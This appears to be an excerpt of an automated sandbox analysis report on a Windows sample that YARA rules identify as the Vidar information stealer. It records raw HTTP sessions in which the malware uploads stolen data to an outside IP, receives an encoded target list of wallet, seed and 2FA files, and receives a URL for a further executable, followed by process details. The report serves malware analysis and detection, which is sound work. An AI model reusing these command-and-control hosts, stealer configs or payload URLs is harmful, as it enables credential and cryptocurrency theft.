                                                                                                                                                                            2024-10-03 01:27:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------JJKFBAKFBGDHIEBGDAKFCont
                                                                                                                                                                            2024-10-03 01:27:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:18 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:27:18 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                                                                                            Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            20192.168.2.94973249.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:19 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 461
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:19 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------EHIJDHCAKKFCBGCBAAECCont
                                                                                                                                                                            2024-10-03 01:27:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:20 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:27:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            21192.168.2.94973349.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:21 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GCBFBGCGIJKJJKFIDBFC
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 131345
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------GCBFBGCGIJKJJKFIDBFCContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------GCBFBGCGIJKJJKFIDBFCCont
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 31 4b 70 4b 45 74 6a 39 53 6e 4a 51 68 46 39 7a 57 61 31 69 58 6e 61 56 48 71 44 58 4a 65 49 76 42 74 6d 6c 72 66 61 70 48 63 7a 69 51 4b 30 78 56 73 46 53 65 76 70 58 55 58 55 38 73 4f 6c 33 44 78 77 6c 70 49 4f 69 4f 32 33 49 47 44 31 77 65 33 36 31 55 31 68 69 33 68 54 55 43 54 6e 4d 44 45 65 77 4b 67 34 2f 57 76 5a 77 53 64 43 6f 70 30 74 4c 36 4f 78 77 59 2b 46 4f 76 53 63 61 71 76 5a 4e 72 37 6a 78 2b 69 69 69 76 74 7a 38 38 43 67 30 55 55 41 4a 58 6f 66 77 75 2f 35 46 2f 55 50 2b 77 6a 4a 2f 36 41 6c 65 65 34 72 30 4c 34 58 66 38 41 49 76 36 68 2f 77 42 68 47 54 2f 30 42 4b 2b 66 7a 33 2f 6c 31 36 76 38 6a 37 44 68 62 2b 48 69 66 53 50 35 6e 62 31 7a 66 68 7a 78 4a 4c 72 4f 70 61 68 61 54 52 78 4c 35 48 7a 52 2b 57 44 6b 4c 76 5a 64 72 35 2f 69 2b
                                                                                                                                                                            Data Ascii: 1KpKEtj9SnJQhF9zWa1iXnaVHqDXJeIvBtmlrfapHcziQK0xVsFSevpXUXU8sOl3DxwlpIOiO23IGD1we361U1hi3hTUCTnMDEewKg4/WvZwSdCop0tL6OxwY+FOvScaqvZNr7jx+iiivtz88Cg0UUAJXofwu/5F/UP+wjJ/6Alee4r0L4Xf8AIv6h/wBhGT/0BK+fz3/l16v8j7Dhb+HifSP5nb1zfhzxJLrOpahaTRxL5HzR+WDkLvZdr5/i+
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 5a 4c 65 4e 51 79 4d 31 32 50 50 64 53 69 4d 47 38 6e 62 6b 4c 38 34 47 63 39 52 58 41 73 50 54 53 73 31 63 39 4f 65 61 59 71 55 33 4b 4d 72 4c 6f 6c 73 6c 30 53 57 32 67 76 78 46 2f 35 45 54 55 76 2b 32 58 2f 6f 31 4b 38 75 35 72 31 48 34 69 2f 38 69 4a 71 58 2f 62 4c 2f 41 4e 47 70 58 6c 39 66 51 5a 46 2f 46 71 2b 6b 66 2f 62 6a 35 54 69 66 2f 63 73 4e 2f 69 71 66 6c 53 45 6f 6f 6f 72 36 51 2b 4c 43 69 69 69 67 42 4b 4b 57 69 67 59 43 69 69 69 67 41 4e 4a 53 30 6c 41 42 53 47 6c 6f 6f 41 53 69 69 69 67 41 6f 6f 6f 6f 47 4a 52 53 6d 6b 6f 41 53 69 6c 70 4d 55 77 43 6b 70 61 4b 41 45 6f 70 61 4b 42 69 55 55 55 55 41 42 6f 6f 70 4b 59 42 51 61 4b 4b 42 69 55 55 70 70 4b 41 45 6f 70 61 53 6d 4d 4b 4b 4b 4b 41 43 6b 70 61 4f 61 41 45 78 53 55 76 61 69 6d 4d
                                                                                                                                                                            Data Ascii: ZLeNQyM12PPdSiMG8nbkL84Gc9RXAsPTSs1c9OeaYqU3KMrLolsl0SW2gvxF/5ETUv+2X/o1K8u5r1H4i/8iJqX/bL/ANGpXl9fQZF/Fq+kf/bj5Tif/csN/iqflSEooor6Q+LCiiigBKKWigYCiiigANJS0lABSGlooASiiigAooooGJRSmkoASilpMUwCkpaKAEopaKBiUUUUABoopKYBQaKKBiUUppKAEopaSmMKKKKACkpaOaAExSUvaimM
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 52 49 53 63 66 64 44 4e 49 63 34 2f 69 48 6f 4b 77 39 72 6d 44 6b 33 5a 36 2f 68 74 2b 4b 31 4f 6c 30 4d 71 35 46 48 6d 57 6c 74 65 2b 39 37 2b 76 2b 52 74 70 63 6f 50 44 30 57 70 53 32 6d 6f 72 43 39 76 64 54 50 71 48 48 32 61 46 6f 6e 6b 52 45 62 35 4f 53 78 52 52 6a 63 44 6c 68 67 64 71 59 75 70 57 4d 30 73 4f 6e 78 4a 65 4c 66 79 36 59 6c 39 48 4b 7a 6f 30 54 75 59 52 4b 55 32 37 41 56 42 47 51 44 75 50 4f 4f 4b 79 4c 59 58 45 56 6e 61 4e 2f 5a 4d 34 31 4b 7a 74 37 6d 33 68 6d 4e 31 2b 35 4b 7a 4e 49 78 4c 52 37 4d 6b 67 53 45 66 66 41 34 42 49 37 55 39 34 35 6d 74 55 4d 47 6d 54 51 36 6b 75 6e 70 59 66 61 4a 4c 6b 50 47 71 72 45 49 69 36 70 73 42 44 46 51 65 72 4d 42 6b 38 5a 77 52 6e 47 57 59 57 36 2f 31 66 2f 67 47 30 34 5a 54 66 54 6c 74 2b 6d 6e
                                                                                                                                                                            Data Ascii: RIScfdDNIc4/iHoKw9rmDk3Z6/ht+K1Ol0Mq5FHmWlte+97+v+RtpcoPD0WpS2morC9vdTPqHH2aFonkREb5OSxRRjcDlhgdqYupWM0sOnxJeLfy6Yl9HKzo0TuYRKU27AVBGQDuPOOKyLYXEVnaN/ZM41Kzt7m3hmN1+5KzNIxLR7MkgSEffA4BI7U945mtUMGmTQ6kunpYfaJLkPGqrEIi6psBDFQerMBk8ZwRnGWYW6/1f/gG04ZTfTlt+mn
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 71 2f 77 43 56 46 6d 42 61 34 6f 7a 56 54 37 66 42 2f 74 2f 6c 52 2f 61 4d 47 65 72 2f 41 4a 55 37 4d 64 69 33 52 6d 71 6e 39 6f 32 2f 71 2f 35 55 66 32 6a 42 2f 74 2f 6c 52 5a 68 59 74 53 6a 4e 6e 64 66 39 63 76 36 69 73 2f 54 54 69 64 76 39 32 6e 79 61 6a 45 62 65 56 45 33 5a 64 64 76 49 39 77 61 72 57 64 77 6c 76 4b 7a 50 6e 42 58 48 46 45 59 74 4a 69 73 61 39 46 56 66 37 51 74 38 64 58 2f 4b 6b 2f 74 47 33 2f 76 4e 2b 56 46 6d 4f 78 62 7a 53 35 71 6e 2f 61 46 74 6e 37 7a 2f 41 4a 55 76 39 6f 32 33 39 35 76 2b 2b 61 4c 4d 4c 46 71 67 39 4b 71 66 32 6a 61 2f 33 6d 2f 37 35 6f 2f 74 4b 32 2f 76 4e 2f 33 7a 52 5a 6a 73 57 36 4b 71 66 32 6a 62 66 33 6e 2f 41 4f 2b 61 50 37 52 74 76 37 7a 2f 41 50 66 4e 46 6d 46 6d 57 38 2b 6c 4c 56 4d 61 6c 61 2f 33 6e 2f
                                                                                                                                                                            Data Ascii: q/wCVFmBa4ozVT7fB/t/lR/aMGer/AJU7Mdi3Rmqn9o2/q/5Uf2jB/t/lRZhYtSjNndf9cv6is/TTidv92nyajEbeVE3ZddvI9warWdwlvKzPnBXHFEYtJisa9FVf7Qt8dX/Kk/tG3/vN+VFmOxbzS5qn/aFtn7z/AJUv9o2395v++aLMLFqg9Kqf2ja/3m/75o/tK2/vN/3zRZjsW6Kqf2jbf3n/AO+aP7Rtv7z/APfNFmFmW8+lLVMala/3n/
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 74 62 30 75 6a 79 31 47 38 6b 6d 50 6f 71 70 2f 61 30 37 2b 4a 72 48 53 70 59 64 4d 2f 30 53 47 36 6b 76 62 6e 37 48 47 45 57 59 51 75 77 51 68 45 2b 5a 59 38 44 50 42 79 32 37 72 67 56 56 73 39 56 6b 6c 6b 61 36 4d 2b 6b 37 54 6f 62 54 4c 71 4a 74 63 32 73 6b 6f 75 6c 51 73 49 76 4b 4c 4c 67 48 5a 7a 47 43 54 7a 6a 48 4a 38 71 57 62 77 69 37 4f 50 39 61 2f 35 48 30 45 65 48 61 6b 31 64 54 2f 44 30 38 39 39 54 56 36 48 49 70 52 57 42 50 34 69 76 4e 50 30 69 4b 36 68 67 30 75 36 6b 6b 31 53 61 4f 52 76 73 69 46 4a 55 57 4f 49 67 4c 6c 41 56 42 33 48 6f 46 50 50 59 31 63 76 74 51 66 54 37 79 57 4b 77 69 67 6c 5a 39 55 6e 73 31 65 35 51 53 72 62 70 47 45 62 5a 74 62 49 4c 48 65 52 6c 68 6e 35 4f 4f 39 57 73 7a 68 7a 63 76 4c 72 2f 41 4d 4e 2f 6d 5a 50 49 71
                                                                                                                                                                            Data Ascii: tb0ujy1G8kmPoqp/a07+JrHSpYdM/0SG6kvbn7HGEWYQuwQhE+ZY8DPBy27rgVVs9Vklka6M+k7TobTLqJtc2skoulQsIvKLLgHZzGCTzjHJ8qWbwi7OP9a/5H0EeHak1dT/D0899TV6HIpRWBP4ivNP0iK6hg0u6kk1SaORvsiFJUWOIgLlAVB3HoFPPY1cvtQfT7yWKwiglZ9Uns1e5QSrbpGEbZtbILHeRlhn5OO9WszhzcvLr/AMN/mZPIq
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 55 41 4a 53 55 74 4a 51 4d 44 53 55 55 55 46 57 45 4e 42 6f 4e 4a 51 43 43 6b 4e 4c 53 55 44 44 4e 4a 6d 69 6b 6f 4b 41 30 6c 47 61 4b 41 45 70 44 53 30 68 4e 41 78 4d 55 55 5a 6f 6f 4b 45 6f 6f 70 4b 42 6f 4b 51 38 55 74 49 66 65 67 59 6c 4a 53 30 47 67 42 50 38 39 61 51 6e 69 6c 4e 4a 30 46 41 77 7a 53 48 70 53 6d 6b 4e 41 30 4a 52 31 6f 37 55 55 78 69 5a 70 44 7a 51 61 58 6f 4b 51 78 4b 51 6d 6c 39 36 54 4e 42 53 44 31 70 4d 35 70 61 51 38 30 41 48 53 6b 4f 50 54 76 53 30 68 50 36 55 44 45 7a 51 52 52 53 5a 70 6a 51 5a 70 41 4b 58 39 4b 53 6b 4d 42 6a 48 74 53 5a 70 54 30 70 4d 30 44 41 63 44 32 70 50 65 6c 35 70 4d 2f 35 4e 4d 41 36 2f 54 33 70 44 6e 48 53 6c 50 58 72 53 45 30 68 69 66 57 69 6c 36 30 6e 58 74 54 47 49 65 74 48 54 70 78 39 4b 58 36 55
                                                                                                                                                                            Data Ascii: UAJSUtJQMDSUUUFWENBoNJQCCkNLSUDDNJmikoKA0lGaKAEpDS0hNAxMUUZooKEoopKBoKQ8UtIfegYlJS0GgBP89aQnilNJ0FAwzSHpSmkNA0JR1o7UUxiZpDzQaXoKQxKQml96TNBSD1pM5paQ80AHSkOPTvS0hP6UDEzQRRSZpjQZpAKX9KSkMBjHtSZpT0pM0DAcD2pPel5pM/5NMA6/T3pDnHSlPXrSE0hifWil60nXtTGIetHTpx9KX6U
                                                                                                                                                                            2024-10-03 01:27:21 UTC16355OUTData Raw: 42 6f 41 53 6b 37 55 55 55 46 43 55 68 70 78 70 70 6f 47 68 61 53 69 69 67 59 6e 30 70 4b 57 6b 6f 41 51 38 30 55 48 6d 69 67 6f 54 50 46 4a 31 70 54 53 55 44 43 6b 70 61 62 51 41 55 64 36 57 6b 36 55 44 45 6f 6f 36 55 5a 6f 47 49 61 53 6c 7a 53 48 2f 41 50 56 51 4d 4b 53 6a 33 6f 50 57 67 59 64 71 54 72 51 61 4f 2f 57 67 41 2f 7a 31 70 4d 2f 35 4e 42 6f 6f 4b 45 6f 50 35 55 64 71 42 32 6f 41 4d 39 63 30 68 50 31 4e 47 65 61 4d 30 44 45 78 6a 76 52 53 2f 72 37 34 70 42 51 4d 54 76 51 61 41 61 4b 41 41 39 61 54 4e 41 36 30 48 70 51 4d 39 44 70 61 59 57 78 73 2b 56 7a 76 66 79 30 49 55 6e 63 2f 48 79 6a 31 50 49 34 39 36 74 72 70 32 6f 50 48 35 69 36 62 66 73 67 7a 6c 68 61 79 45 63 64 65 63 56 69 36 6b 49 37 74 48 79 30 61 4e 57 58 77 78 62 2b 51 6c 70 64
                                                                                                                                                                            Data Ascii: BoASk7UUUFCUhpxppoGhaSiigYn0pKWkoAQ80UHmigoTPFJ1pTSUDCkpabQAUd6Wk6UDEoo6UZoGIaSlzSH/APVQMKSj3oPWgYdqTrQaO/WgA/z1pM/5NBooKEoP5UdqB2oAM9c0hP1NGeaM0DExjvRS/r74pBQMTvQaAaKAA9aTNA60HpQM9DpaYWxs+Vzvfy0IUnc/Hyj1PI496trp2oPH5i6bfsgzlhayEcdecVi6kI7tHy0aNWXwxb+Qlpd
                                                                                                                                                                            2024-10-03 01:27:21 UTC505OUTData Raw: 6c 64 51 58 38 78 4f 2b 34 74 35 54 45 78 7a 31 48 79 34 77 4f 6e 41 34 34 46 46 67 75 65 6e 51 61 37 4e 64 6d 50 55 74 42 6e 75 4a 4c 69 62 57 72 4b 77 75 4c 6e 61 56 6b 76 49 31 68 78 6d 51 64 78 49 77 59 6b 48 72 67 5a 35 46 5a 64 39 4c 4e 59 32 32 71 61 4a 63 61 6c 48 48 59 61 6e 4d 31 74 70 46 68 4c 4a 74 67 68 69 2b 30 45 2f 61 57 2f 68 51 44 61 77 44 66 65 4f 53 65 6e 4a 34 6b 2b 4b 50 45 44 58 4d 31 79 32 75 36 6d 62 69 61 50 79 70 5a 54 64 79 62 6e 54 2b 36 78 7a 6b 72 79 65 44 78 7a 53 66 38 4a 4e 72 33 39 6d 2f 32 62 2f 62 65 70 66 59 4e 6e 6c 2f 5a 66 74 63 6e 6c 62 50 37 75 7a 4f 4d 65 32 4b 4c 44 75 64 6e 38 51 4c 4b 4f 30 38 48 65 48 34 4c 52 37 4e 37 47 30 75 62 6d 33 68 65 43 37 68 6c 4d 6f 78 47 53 35 32 4d 65 57 49 59 6e 2b 37 6c 51 63
                                                                                                                                                                            Data Ascii: ldQX8xO+4t5TExz1Hy4wOnA44FFguenQa7NdmPUtBnuJLibWrKwuLnaVkvI1hxmQdxIwYkHrgZ5FZd9LNY22qaJcalHHYanM1tpFhLJtghi+0E/aW/hQDawDfeOSenJ4k+KPEDXM1y2u6mbiaPypZTdybnT+6xzkryeDxzSf8JNr39m/2b/bepfYNnl/ZftcnlbP7uzOMe2KLDudn8QLKO08HeH4LR7N7G0ubm3heC7hlMoxGS52MeWIYn+7lQc
                                                                                                                                                                            2024-10-03 01:27:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:22 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:27:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            22192.168.2.94973449.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:23 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:23 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------JDGCGHCGHCBFHJJKKJEHCont
                                                                                                                                                                            2024-10-03 01:27:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:24 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:27:24 UTC91INData Raw: 35 30 0d 0a 4d 54 49 32 4e 6a 6b 78 4d 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 32 45 30 4d 7a 51 34 4e 6a 45 79 4f 44 4d 30 4e 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 50MTI2NjkxMnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zL2E0MzQ4NjEyODM0Ny5leGV8MXxra2trfA==0


                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:21:26:16
                                                                                                                                                                            Start date:02/10/2024
                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                            Imagebase:0xbe0000
                                                                                                                                                                            File size:421'040 bytes
                                                                                                                                                                            MD5 hash:D5251BD2A4D9EE464B1DBB25245A67A7
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:1
                                                                                                                                                                            Start time:21:26:16
                                                                                                                                                                            Start date:02/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff70f010000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:3
                                                                                                                                                                            Start time:21:26:16
                                                                                                                                                                            Start date:02/10/2024
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                                                            Imagebase:0x760000
                                                                                                                                                                            File size:43'016 bytes
                                                                                                                                                                            MD5 hash:5D1D74198D75640E889F0A577BBF31FC
